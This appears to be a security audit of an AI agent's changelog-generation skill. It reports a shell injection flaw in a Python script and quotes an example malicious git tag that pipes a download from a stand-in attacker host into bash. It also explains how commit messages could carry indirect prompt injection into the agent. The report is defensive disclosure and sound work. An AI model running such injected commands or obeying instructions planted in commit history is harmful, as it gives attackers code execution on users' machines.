changelog

Warn

Audited by Gen Agent Trust Hub on Apr 14, 2026

Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The script scripts/changelog-generator.py is vulnerable to shell command injection. It constructs a git command string using f-strings (e.g., f'git log {from_ref}..{to_ref} ...') and executes it via subprocess.run(..., shell=True). The from_ref variable is often populated by the result of git describe, which returns git tags. If an attacker creates a maliciously named tag (e.g., ; curl http://attacker.com/pwn | bash ;), the injected command will be executed when the script runs.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection through git commit logs.
      ◦ Ingestion points: Git commit messages enter the agent's context through scripts/changelog-generator.py and scripts/changelog-generator.sh during the changelog generation process.
      ◦ Boundary markers: The generated CHANGELOG.md uses standard markdown formatting but does not implement specific delimiters or warnings to treat commit-derived content as untrusted data.
      ◦ Capability inventory: The skill has capabilities to write files (CHANGELOG.md) and execute shell commands (git, npm, cargo).
      ◦ Sanitization: Commit descriptions are extracted via regex and placed directly into the final markdown output without any escaping or sanitization of potentially malicious instructions embedded in the commit history.
  • [COMMAND_EXECUTION]: The shell scripts scripts/changelog-generator.sh and scripts/changelog-validator.sh expand variables such as $version and $CHANGELOG_FILE directly within shell commands. This lacks robust sanitization and could lead to unexpected behavior if run in an environment with untrusted file names or version strings.
  • [REMOTE_CODE_EXECUTION]: The skill documentation suggests the installation and use of several third-party tools, such as bump2version via PyPI and standard-version or conventional-changelog-cli via NPM. These represent external code dependencies that are executed in the host environment.
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 14, 2026, 01:22 AM